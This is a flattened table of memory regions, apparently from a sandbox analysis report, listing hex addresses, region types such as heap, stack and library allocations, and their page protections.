heap
|
page read and write
|
||
|
2E33A88C000
|
heap
|
page read and write
|
||
|
2E33FE40000
|
trusted library allocation
|
page read and write
|
||
|
F3A8B7E000
|
stack
|
page read and write
|
||
|
F3A8EFA000
|
stack
|
page read and write
|
||
|
7FFB4B320000
|
trusted library allocation
|
page read and write
|
||
|
1BC685A8000
|
heap
|
page read and write
|
||
|
2E33FDC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B240000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B210000
|
trusted library allocation
|
page read and write
|
||
|
2E33FD20000
|
trusted library allocation
|
page read and write
|
||
|
2E33FEF7000
|
heap
|
page read and write
|
||
|
7FFB4B44B000
|
trusted library allocation
|
page read and write
|
||
|
2E340080000
|
remote allocation
|
page read and write
|
||
|
1BC6A72F000
|
heap
|
page read and write
|
||
|
7FFB4B4F0000
|
trusted library allocation
|
page read and write
|
||
|
B86BDCD000
|
stack
|
page read and write
|
||
|
7FFB4B2C0000
|
trusted library allocation
|
page read and write
|
||
|
2E340010000
|
trusted library allocation
|
page read and write
|
||
|
1BC68760000
|
heap
|
page read and write
|
||
|
F3A83FB000
|
stack
|
page read and write
|
||
|
1BC10010000
|
trusted library allocation
|
page read and write
|
||
|
2E33FD10000
|
trusted library allocation
|
page read and write
|
||
|
1BC6A283000
|
trusted library allocation
|
page read and write
|
||
|
1BC6A73A000
|
heap
|
page read and write
|
||
|
2E33A8BD000
|
heap
|
page read and write
|
||
|
1BC6A4D8000
|
heap
|
page read and write
|
||
|
7FFB4B0BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E33A8B4000
|
heap
|
page read and write
|
||
|
F3A86FE000
|
unkown
|
page readonly
|
||
|
2E33A8A7000
|
heap
|
page read and write
|
||
|
1BC6A759000
|
heap
|
page read and write
|
||
|
2E33FC60000
|
trusted library allocation
|
page read and write
|
||
|
F3A81FB000
|
stack
|
page read and write
|
||
|
F3A8BFE000
|
unkown
|
page readonly
|
||
|
1BC68705000
|
heap
|
page read and write
|
||
|
1BC102F9000
|
trusted library allocation
|
page read and write
|
||
|
B86AF76000
|
stack
|
page read and write
|
||
|
1BC685B5000
|
heap
|
page read and write
|
||
|
2E33B100000
|
heap
|
page read and write
|
||
|
2E33FD10000
|
trusted library allocation
|
page read and write
|
||
|
1BC68510000
|
heap
|
page read and write
|
||
|
1BC6A760000
|
heap
|
page read and write
|
||
|
7FFB4B120000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B330000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B260000
|
trusted library allocation
|
page read and write
|
||
|
1BC016E4000
|
trusted library allocation
|
page read and write
|
||
|
1BC6A511000
|
heap
|
page read and write
|
||
|
7FFB4B1B1000
|
trusted library allocation
|
page read and write
|
||
|
2E33AA00000
|
heap
|
page read and write
|
||
|
2E33FE54000
|
heap
|
page read and write
|
||
|
2E340080000
|
remote allocation
|
page read and write
|
||
|
F3A79F7000
|
stack
|
page read and write
|
||
|
F3A887E000
|
stack
|
page read and write
|
||
|
2E33FEC0000
|
heap
|
page read and write
|
||
|
7FFB4B1F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BC6862A000
|
heap
|
page read and write
|
||
|
1BC6A330000
|
heap
|
page read and write
|
||
|
1BC6A7E6000
|
heap
|
page read and write
|
||
|
1BC685A0000
|
heap
|
page read and write
|
||
|
2E33FEE9000
|
heap
|
page read and write
|
||
|
2E33FD49000
|
trusted library allocation
|
page read and write
|
||
|
1C46BF44000
|
heap
|
page read and write
|
||
|
1BC6A440000
|
heap
|
page read and write
|
||
|
B86BF88000
|
stack
|
page read and write
|
||
|
1BC6A87F000
|
heap
|
page read and write
|
||
|
7FFB4B00D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E33FD51000
|
trusted library allocation
|
page read and write
|
||
|
1C46BF0B000
|
heap
|
page read and write
|
||
|
1BC6A7DD000
|
heap
|
page read and write
|
||
|
B86B1FE000
|
stack
|
page read and write
|
||
|
2E33BC21000
|
trusted library allocation
|
page read and write
|
||
|
2E33A85A000
|
heap
|
page read and write
|
||
|
2E33FCD0000
|
trusted library allocation
|
page read and write
|
||
|
2E33FEFF000
|
heap
|
page read and write
|
||
|
1BC68570000
|
heap
|
page read and write
|
||
|
2E33FEFB000
|
heap
|
page read and write
|
||
|
1BC6A535000
|
heap
|
page read and write
|
||
|
7FFB4B280000
|
trusted library allocation
|
page read and write
|
||
|
1BC6A320000
|
heap
|
page execute and read and write
|
||
|
2E33B800000
|
trusted library allocation
|
page read and write
|
||
|
1BC6A5D7000
|
heap
|
page execute and read and write
|
||
|
2E33AE90000
|
trusted library allocation
|
page read and write
|
||
|
1BC685F0000
|
heap
|
page read and write
|
||
|
2E33A896000
|
heap
|
page read and write
|
||
|
1BC68710000
|
trusted library allocation
|
page read and write
|
||
|
F3A95FE000
|
unkown
|
page readonly
|
||
|
2E33A873000
|
heap
|
page read and write
|
||
|
7FFB4B2B0000
|
trusted library allocation
|
page read and write
|
||
|
2E33B6F0000
|
trusted library section
|
page readonly
|
||
|
1C46C01D000
|
heap
|
page read and write
|
||
|
7FFB4B2F0000
|
trusted library allocation
|
page read and write
|
||
|
2E33FDB0000
|
trusted library allocation
|
page read and write
|
||
|
2E33FE30000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B220000
|
trusted library allocation
|
page read and write
|
||
|
1C46BFBB000
|
heap
|
page read and write
|
||
|
2E33FE4F000
|
heap
|
page read and write
|
||
|
B86BD4E000
|
stack
|
page read and write
|
||
|
1BC10001000
|
trusted library allocation
|
page read and write
|
||
|
2E33FD24000
|
trusted library allocation
|
page read and write
|
||
|
2E33B6E0000
|
trusted library section
|
page readonly
|
||
|
B86B17E000
|
stack
|
page read and write
|
||
|
1BC00001000
|
trusted library allocation
|
page read and write
|
||
|
2E33FE21000
|
heap
|
page read and write
|
||
|
B86AFFC000
|
stack
|
page read and write
|
||
|
1C46BFEF000
|
heap
|
page read and write
|
There are 312 hidden memdumps, click here to show them.